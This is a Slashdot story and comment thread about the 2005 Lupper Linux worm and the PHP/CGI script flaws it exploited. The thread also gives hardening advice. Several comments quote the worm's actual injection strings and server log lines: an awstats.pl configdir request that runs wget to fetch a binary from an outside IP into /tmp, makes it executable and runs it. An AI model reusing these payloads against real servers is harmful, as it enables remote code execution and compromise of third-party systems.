×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Linux Lupper.Worm In the WIld

CmdrTaco posted more than 8 years ago | from the inching-its-way-around-the-net dept.

Worms 363

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

363 comments

CONTINUE: (5, Funny)

xtracto (837672) | more than 8 years ago | (#13978478)

Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.

p.s. BURN KARMA BURN!

Re:CONTINUE: (1, Funny)

EraserMouseMan (847479) | more than 8 years ago | (#13978535)

Of course, Linux is perfect by definition.

And I'm sure this worm was written by a Microsoftie or possibly by Bill Gates himself.

Re:CONTINUE: (4, Insightful)

freeweed (309734) | more than 8 years ago | (#13978690)

Well, actually, yes. Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.

Re:CONTINUE: (2, Insightful)

ksjfhdsalf (892941) | more than 8 years ago | (#13978704)

Your damn right it's the system admin's fault. Because the worm can only get in if your linux server "is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed". Not like you couldn't fuck a windows server the same way. ...upload - FuckYou.bat ...execute - www.dumbass.com/UnsecureDir/FuckYou.bat

Remarkably Useless page. (5, Interesting)

Short Circuit (52384) | more than 8 years ago | (#13978479)

First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

Second, how do you remove it? Quoth the page:
Removal Instructions
AVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Re:Remarkably Useless page. (3, Informative)

TheSpoom (715771) | more than 8 years ago | (#13978500)

It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.

I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.

Re:Remarkably Useless page. (4, Insightful)

tomhudson (43916) | more than 8 years ago | (#13978552)

More alarmist shit (and old news at tht - The Reg reported this last week).

Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.

Re:Remarkably Useless page. (0)

Anonymous Coward | more than 8 years ago | (#13978565)

The McAfee page does not list the actual scripts just potential locations for the script. Hence you are a troll.

Re:Remarkably Useless page. (1)

tomhudson (43916) | more than 8 years ago | (#13978763)

I wouldn't call the gp poster a troll. I'd say its more like the antivirus company trolling us. The only reason the risk is rated "low" is because their rating scale doesn't go below that.

Re:Remarkably Useless page. (5, Informative)

gowen (141411) | more than 8 years ago | (#13978513)

According to ZDNet/Symantec [zdnet.com]
"The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."

Other links (4, Informative)

AndroidCat (229562) | more than 8 years ago | (#13978599)

Security Focus [securityfocus.com] eWeek [eweek.com] CNet [com.com]

It's not Windows (5, Informative)

max born (739948) | more than 8 years ago | (#13978735)

From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

PHP exploit, not directly a linux problem? (5, Insightful)

Anonymous Coward | more than 8 years ago | (#13978480)

Seems kind of wrong to name it exclusively a linux problem.

Re:PHP exploit, not directly a linux problem? (5, Informative)

mysqlrocks (783488) | more than 8 years ago | (#13978542)

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

Re:PHP exploit, not directly a linux problem? (3, Informative)

rbochan (827946) | more than 8 years ago | (#13978713)

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

According to this article [com.com] , AWStats was patched back in February.

Re:PHP exploit, not directly a linux problem? (2, Interesting)

EraserMouseMan (847479) | more than 8 years ago | (#13978568)

Is it possible for this exploit to occur under any other OS other than Linux? If so, then maybe Linux is not the root cause, but it is definately "a linux problem".

Re:PHP exploit, not directly a linux problem? (0)

Anonymous Coward | more than 8 years ago | (#13978628)

So if someone writes a worm that exploits a hole in a Java app, can we claim it's a Solaris-only worm? How about C#-based worms?

Re:PHP exploit, not directly a linux problem? (2, Insightful)

sqlrob (173498) | more than 8 years ago | (#13978651)

The worm is, since it downloads an executable.

The security holes are most likely generic.

How can we get some free press? (3, Insightful)

ivan256 (17499) | more than 8 years ago | (#13978484)

Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!

Re:How can we get some free press? (4, Insightful)

jellomizer (103300) | more than 8 years ago | (#13978529)

Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.

Re:How can we get some free press? (5, Insightful)

sqlrob (173498) | more than 8 years ago | (#13978576)

IE Worm = Windows worm.

Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

Re:How can we get some free press? (-1, Flamebait)

Anonymous Coward | more than 8 years ago | (#13978611)

And we'll just conveniently ignore the part about Outlook, shall we?

Troll-faced monkey fucker...

Re:How can we get some free press? (1)

slavemowgli (585321) | more than 8 years ago | (#13978659)

Then it should be a Linux/*BSD worm, and even that would still be misleading at best, as PHP is what's the problem here. Yes, it's PHP on specific platforms only, but the hole is in PHP, not Linux or *BSD, so it *should* be called a "PHP worm affecting Linux/*BSD platforms", or something similar.

Re:How can we get some free press? (0)

Anonymous Coward | more than 8 years ago | (#13978694)

Effect is a noun. Affect is a transitive verb.

"It only *****s Linux and BSD systems" - you want a verb. Hence, you wanted to use affect.

There are rare uses of effect as a verb and affect as a noun, but I can tell that you are quite common, so you probably don't need to know much about them.

Re:How can we get some free press? (2, Insightful)

SmellTheCoffee (808375) | more than 8 years ago | (#13978729)

An IE Worm or Outlook Work is absolutely **a windows worm** since they they are all designed by Microsoft and integrated tightly in the OS. Linus didn't write PHP and any Linux distro or BSD's don't require you to install PHP. You are free to install or uninstall PHP. Attributing this worm to Linux is like blaming Windows for an Adobe Acrobat vulnerability.

Re:How can we get some free press? (2, Interesting)

cnelzie (451984) | more than 8 years ago | (#13978770)

Except the blasted media only calls them "Computer Worms", they do not mention Windows as the problem. That is why everytime one of those stupid announcements make it onto "Good Morning America", I get a call from the boss asking if our servers are safe and everytime, I have to say, that is a Windows problem, not a Linux problem.

    It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...

So.... (0)

Anonymous Coward | more than 8 years ago | (#13978487)

We must make an effort to get infected?

if it attacks PHP cross-platform... (4, Insightful)

frankie (91710) | more than 8 years ago | (#13978489)

...then it's a PHP/*nix worm, not Linux specifically.

Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

Re:if it attacks PHP cross-platform... (0)

Anonymous Coward | more than 8 years ago | (#13978582)

Theoretically, yes, it could be modified to attack OS X. The problem is that the non-server version, at least, doesn't have PHP enabled by default, and it's not the easiest thing for a normal user to enable. Thus, it could attack OS X Server installs, assuming the administrator had enabled PHP, but that's a really small number of people. If it was a binary worm, then it just wouldn't be able to spread. Script worms are a lot easier to defend against, since they tend not to change from platform to platform, so ClamAV and similar should pick them up and block them without too much trouble.

Also.. (0)

handmedowns (628517) | more than 8 years ago | (#13978495)

The target has to be standing on one foot, and it needs to be the third wednesday of the month in February.

Really, cmon now.. this gets news? OK, Bravo.. a linux worm.. take away the fact that it's really a web vulnerability that seems to take advantage of a "shell" it could be a solaris/irix/aix/openserver/bsd worm as well..

But for the smear campaign, lets just call it the linux worm to stirr up the zealots.

Sadly a preview of things to come because... (5, Insightful)

Assmasher (456699) | more than 8 years ago | (#13978498)

...Linux is more and more popular with corporations holding valuable and important data.

Success is a double-edged sword. ;)

Re:Sadly a preview of things to come because... (0)

Anonymous Coward | more than 8 years ago | (#13978523)

You seem to have misspelled 'hatter' as 'masher' in your user name.

Linux what? (0, Redundant)

psyeye (883344) | more than 8 years ago | (#13978501)

So it's just the name of the worm or does anyone seriously think this is a Linux-worm? It's a web-server worm - nothing more than that!


psyeye

Re:Linux what? (0)

Anonymous Coward | more than 8 years ago | (#13978653)

Are we sure it's not a denial of service attack?

Complete infection (5, Funny)

soren.harward (1153) | more than 8 years ago | (#13978505)

All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

Re:Complete infection (0)

Anonymous Coward | more than 8 years ago | (#13978626)

Hey, there's 13. I've patched already!

Been around earlier? (1, Interesting)

Anonymous Coward | more than 8 years ago | (#13978507)

According to http://searchsecurity.techtarget.com/qna/0,289202, sid14_gci955041,00.html [techtarget.com] , this worm started in 2002... or am I mistaken?

Re:Been around earlier? (1)

jurt1235 (834677) | more than 8 years ago | (#13978755)

Well, if it turns out to be a dupe, than it took forever for the fixes. For example wordpress 1.5.1 v2 is still vulnerable. 1.5.2 is now just around. Just as for some other software. I would than say that this was a seriously ignored problem.

OUTGOING (-1, Offtopic)

Anonymous Coward | more than 8 years ago | (#13978515)

HELLO WORLD
73019 73019
HELLO WORLD
63025 63025 17392 17392 14423 14423 20330 20330 10502 10502
39249 39249 11666 11666 92050 92050 31489 31489 12017 12017
91449 91449 71201 71201 95063 95063 67563 67563 79077 79077
51271 51271 99720 99720 86892 86892 72445 72445 87005 87005
14701 14701 93874 93874 05152 05152 76098 76098 60587 60587
83326 83326 05000 05000 75456 75456 19169 19169 71103 71103
29614 29614 33310 33310 21885 21885 38037 38037 72288 72288
30196 30196 92021 92021 40729 40729 81165 81165 55873 55873
78412 78412 60643 60643 73637 73637 06040 06040 57886 57886
09843 09843 83878 83878 47509 47509 53767 53767 63647 63647
54452 54452 51669 51669 20767 20767 96241 96241 72135 72135
92127 92127 52121 52121 76879 76879 25238 25238 42595 42595
08869 08869 21689 21689 16334 16334 77427 77427 56470 56470
50724 50724 49221 49221 30932 30932 39564 39564 19423 19423
13439 13439 67032 67032 05322 05322 40985 40985 90064 90064
94614 94614 99157 99157 20574 20574 59352 59352 79309 79309
48629 48629 31259 31259 26644 26644 58377 58377 73247 73247
55599 55599 34649 34649 55873 55873 61385 61385 19036 19036
92464 92464 03611 03611 09276 09276 77138 77138 87096 87096
70851 70851
K-BYE

Conditions for infection... (4, Insightful)

xutopia (469129) | more than 8 years ago | (#13978520)

"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

Re:Conditions for infection... (0)

Anonymous Coward | more than 8 years ago | (#13978591)

The problem is, everyone starts somewhere. Not everyone who runs a web-server is a genius at administering them. I tried for six months, and finally gave up. I just didn't know enough to keep it up to date and not crashing. Granted, half my problems were caused by data corruption on the part of my host, but I didn't know much. I would assume I did not setup Apache to do this, but who knows. So to assume that no one is vulnerable to this is nonsense... not everyone is a technical expert on every aspect of the computing world.

Re:Conditions for infection... (5, Funny)

maxwell demon (590494) | more than 8 years ago | (#13978648)

Hey, I've found a way to write a true Linux worm! It can infect all Linux computers which have a user named "wormhole" with password "unsafe", and have a suid-root copy of bash installed at /bin/rootbash which is executable by user "wormhole". Ah, and of course the user "wormhole" must be able to remote login through either rlogin or ssh with password authentication enabled. To spread, the worm also needs the file /etc/wormspreadrc, which must contain a list of other vulnerable computers, one hostname or IP number per line.

SCNR

Re:Conditions for infection... (5, Informative)

smoking2000 (611012) | more than 8 years ago | (#13978670)

The command it runs is:
|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|
It is passed to awstats.pl in a request like:
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1
There are also POST request to xmlrpc.php pages, like:
POST /drupal/xmlrpc.php HTTP/1.1
So if you have /tmp mounted noexec this should not be a problem.

Re:Conditions for infection... (1)

Ramses0 (63476) | more than 8 years ago | (#13978750)

Not configuration of apache, but configuration of PHP.

Basically, it's whether you allow the following:

A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful).

#2 is just plain dumb.

I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) in their later releases.

--Robert

Re:Conditions for infection... (2, Informative)

Ramses0 (63476) | more than 8 years ago | (#13978776)

Damned slashdot eats my code examples. Re-post.

It's Not configuration of apache, but configuration of PHP. Basically, it's whether you allow the following:

[?php
    $foo = `ls`;

    $bar = include("http://foo.com/example.txt");
?]

A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).

#2 is just plain dumb.

I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) by default in their later releases.

--Robert

Before all teh MSFT fanboys jump on this, (5, Funny)

Anonymous Coward | more than 8 years ago | (#13978522)

Paraphrased from the virus description;

IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,

THEN you might need to take a look at if you are at risk.

Paraphrased from the virus description of most MSFT worms:

IF you run an MSFT operating system
AND you havent reformated your HDD in the lsat hour

THEN its time to pucker up and kiss the sucker goodbye..

-GenTimJS

Re:Before all teh MSFT fanboys jump on this, (-1, Troll)

Assmasher (456699) | more than 8 years ago | (#13978550)

You don't feel hypocritical about calling M$ zealots fanboys when you write crap like that? LOL.

Re:Before all teh MSFT fanboys jump on this, (0)

Anonymous Coward | more than 8 years ago | (#13978631)

LOL says the Assmasher
wondering why
they modded him
into oblivion

Re:Before all teh MSFT fanboys jump on this, (1, Insightful)

Assmasher (456699) | more than 8 years ago | (#13978703)

That's funny, and a typical slashdot experience. Someone bashes M$ when something that could even be remotely construed as critical of Linux, and then someone like me points out the hypocrisy of their post, and get modded as a troll. LOL. Next thing you know it will be modded 'Nazi'. Standard slashdot/internet model.

Re:Before all teh MSFT fanboys jump on this, (0)

Anonymous Coward | more than 8 years ago | (#13978714)

Did you post that from a cell phone?

It's not the MSFT fanboys you have to worry about (0)

Anonymous Coward | more than 8 years ago | (#13978563)

It's the AAPL fanboys you have worry about hereabouts on slashdot: they are all moderators a re-up on quality crack just came through.

Re:Before all teh MSFT fanboys jump on this, (1)

a302b (585285) | more than 8 years ago | (#13978685)

...is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform.
Can someone help me out here? Isn't BSD supposed to be secure by default? And only when you know what you are doing are you able to loosen restrictions? So if, as the parent so kindly pointed out:
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
How the HECK does this virus spread on BSD machines???!!!!!

Re:Before all teh MSFT fanboys jump on this, (1)

sootman (158191) | more than 8 years ago | (#13978721)

Isn't BSD supposed to be secure by default?

Um, yeah, and AFAIK, part of that includes not having the webserver on by default. You turn it on, you're at risk.

So let me get this straight (-1, Flamebait)

AKAImBatman (238306) | more than 8 years ago | (#13978539)

Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers? Is there something wrong with this picture?

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

*cough*Wouldn't have happened with a J2EE server.*cough*

And in one fell swoop, this virus helpfully explains to everyone why there is a market for J2EE servers, why people use Macs as their Desktops, and why Linux's reputation isn't quite spotless in comparison to Mac OS X. This is particularly interesting because we've had this discussion in several other threads with many people saying that the whole "no viruses" marketing applies as equally to Linux as it does to Macs. Similarly, many have said that PHP is just as useful for Enterprise work as J2EE. Yet these are the types of things these systems were designed to prevent.

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

Re:So let me get this straight (1)

FinestLittleSpace (719663) | more than 8 years ago | (#13978561)

Linux has a huge market share in the server market, idiot.

Re:So let me get this straight (1)

AKAImBatman (238306) | more than 8 years ago | (#13978636)

Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.

Re:So let me get this straight (2, Insightful)

Blob Pet (86206) | more than 8 years ago | (#13978601)

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.

In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.

Re:So let me get this straight (1)

bperkins (12056) | more than 8 years ago | (#13978666)



Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(


As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable php or cgi script. I don't think many Linux system ship in this configuration. The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.

Re:So let me get this straight (1)

AKAImBatman (238306) | more than 8 years ago | (#13978766)

True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(

I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.

What's really interesting, however, is the fact that the worm is very similar to the Slapper worm [symantec.com] . The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?

Re:So let me get this straight (0)

Anonymous Coward | more than 8 years ago | (#13978688)

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

Web server running by default? Debian doesn't do that. Apache isn't even installed by default. PHP is a seperate install from Apache. This worm appears to be a problem with PHP, not Linux. Linux is just a kernel. If distros have Apache/PHP up and running by default, that is not good, but its wrong to blame Linux for it when the kernel isn't even remotely involved in the vulnerability.

Re:So let me get this straight (1)

niskel (805204) | more than 8 years ago | (#13978734)

Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.

Re:So let me get this straight (1)

ponds (728911) | more than 8 years ago | (#13978775)

Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.

No one enables it though, I'm just being a smartass.

Re:So let me get this straight (1)

the packrat (721656) | more than 8 years ago | (#13978782)

Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.
The distributor would be the person who ships it, yes?

Too many ifs (5, Interesting)

SolitaryMan (538416) | more than 8 years ago | (#13978540)

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...

which in practice means that your admin have died a couple of years ago but was never replaced.

Re:Too many ifs (1, Interesting)

Anonymous Coward | more than 8 years ago | (#13978765)

.. or your box is one of gazillions of dedicated servers maintained by hobby admins.

Short of detail (4, Informative)

QuaintRealist (905302) | more than 8 years ago | (#13978544)

So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:

"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?

Re:Short of detail (2, Informative)

jurt1235 (834677) | more than 8 years ago | (#13978658)

This list is affected: http://www.securityfocus.com/bid/14088/info [securityfocus.com]

Re:Short of detail (1)

ajs (35943) | more than 8 years ago | (#13978784)

I notice that MediaWiki is NOT on this list. This corresponds to my experience. I had some older weblog software exploited, and had to mop up after it, but my MediaWiki installation was fine.

Of course, MediaWiki is the pet target of some zombie-based spamming attacks right now, but that's not MW's fault, and I can clean up after that ok for now. If it gets worse, I'll have to start using some kind of visual authentication scheme.

Does it look like this? (5, Informative)

Mabonus (185893) | more than 8 years ago | (#13978545)

I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
For 60 hits.

Re:Does it look like this? (0)

Anonymous Coward | more than 8 years ago | (#13978598)

Yes, it's looking for an ancient version of awstats.

Re:Does it look like this? (0)

Anonymous Coward | more than 8 years ago | (#13978676)

...wget%2062%2e101%2e193%2e244...

As you can see this is trying to download a file from some machine that according to whois is/was in Norway and seems to be gone now.

Re:Does it look like this? (1)

smoking2000 (611012) | more than 8 years ago | (#13978774)

I have a variation on this one besides the "flupii" one. This one uses a file called "listen"
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%2 0YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2fli sten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216% 2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1
I think there is also a "scout" part, which finds vulnarable hosts, as I also have requests like this:
GET /usage/cgi-bin/awstats.pl?configdir=|echo%20;echo% 20;cat%20awstats.pl;echo%20;echo| HTTP/1.1

Linux? (2, Interesting)

noz (253073) | more than 8 years ago | (#13978555)

I dislike the labelling of this worm as Linux/Slapper. The only platform identification is,
This worm spreads by exploiting web servers hosting vulnerable PHP/CGI scripts.
I also know that tomorrow a colleague will say something akin to, "Quit razzing my Windows platforms. Your precious Linux also has security problems." Grrrr...

Re:Linux? (0)

Anonymous Coward | more than 8 years ago | (#13978719)

Karma's a bitch, huh? Or is this just some Windows user who accidentally stumbled across the fact that you use Linux, and you've never given him any crap for any Windows vulnerability ever?

I hope your colleague is every bit as smug as you are when you dump on Windows.

this isn't meant for us (0, Troll)

caffeinemessiah (918089) | more than 8 years ago | (#13978567)

Whichever av company it was that put out this release, it clearly isn't meant for anyone who's ever used *nix. This message is aimed at potential corporate *nix adopters for whom the lack of viruses might have been a strong selling point. I'm willing to put serious money that there's some lobby cash behind this. This is just like Bush's war - no one with a brain believes its right, but the majority without the brains do, and that's all thats needed. It's disgusting.

Did some more research (1)

jurt1235 (834677) | more than 8 years ago | (#13978580)

McAfee sucks for real info, look at symantec [symantec.com] or at my at summary [hipersonik.com] . In short: Update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated though.

It's a Linux worm? Riiiiiiight.... (0)

crivens (112213) | more than 8 years ago | (#13978588)

It's a Linux worm? Riiiiiiight.... I wonder who originally raised this with McAfee.

More coverage Linux.Plupii description available (1)

jjMick (911387) | more than 8 years ago | (#13978597)

Symantec has a more coverage description page at http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html [symantec.com] including links to XML-RPC PHP1.x library vulnerabilities used by this malware. This worm is also known as Linux.Plupii and Linux/Lupper.A too. Internet Storm Center has a lot of technical information at their http://isc.sans.org/diary.php?storyid=823 [sans.org]

Linux/BSD only (3, Funny)

WhiteWolf666 (145211) | more than 8 years ago | (#13978623)

Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.

It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.

Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!

Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

Re:Linux/BSD only (4, Insightful)

mysqlrocks (783488) | more than 8 years ago | (#13978730)

Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

Well ..... (0)

Anonymous Coward | more than 8 years ago | (#13978672)

I already have tcpflow -c port 110 |grep -i pass running in a spare VC. Perhaps now I ought to have tcpflow -c port 80 running in another spare VC at all times, just in case. But I'm going to run out of VCs soon!

More info (1)

max born (739948) | more than 8 years ago | (#13978680)

According to MacAfee its: It is a modified derivative of the Linux/Slapper ...

And according to a 2002 cert advisory [cert.org] the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..

Surprisingly their seem to be no mention of it a apache.org which leads me to think it's pretty benign and not wide spread. I could be wrong.

no login shell (1)

Understudy (111386) | more than 8 years ago | (#13978707)

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

1. don't permit external shell access through you www accounts. Make all you www accounts shell be /usr/bin/false. I realize that some people need cli access but it should be severly limited in it's functions and only used by those who have a real need.
2. don't permit php/cgi scripts that are explotiable. Okay that is a broad general statement , however there are well known malicious scripts and well known explotiable scripts. Don't allow them. And certainly don't allow them if cli access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com [34sp.com] (shameless plug with who I am hosted on)

clearly a violation (4, Funny)

FudRucker (866063) | more than 8 years ago | (#13978712)

if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL

Simple but effective hardening measures (1)

dskoll (99328) | more than 8 years ago | (#13978732)

Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.

  • Enable SELinux. However, if you're running these kinds of scripts, you probably aren't protected by SELinux.
  • Mount /tmp with the noexec flag. Again, not complete protection if the malware is a script (because it can be invoked explicitly with the command interpreter), but it would stop this particular one.
  • Change the permissions on wget so that apache can't read or execute it. Or, remove wget completely from your server. Similarly for rsync, ncftp, etc.

Why Linux is still more secur (1)

ZachPruckowski (918562) | more than 8 years ago | (#13978740)

Unless I misundersand the article and comments, it seems that

Safety of Linux user who screws up >> MS user who does everything right

Yah! A Worm! (1)

barefootgenius (926803) | more than 8 years ago | (#13978742)

Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.

linux? sounds like apache+php (1)

Cheeze (12756) | more than 8 years ago | (#13978749)

sounds to me like an apache with php problem.

I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?

sounds to me like a new version of the old formmail.pl problem.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
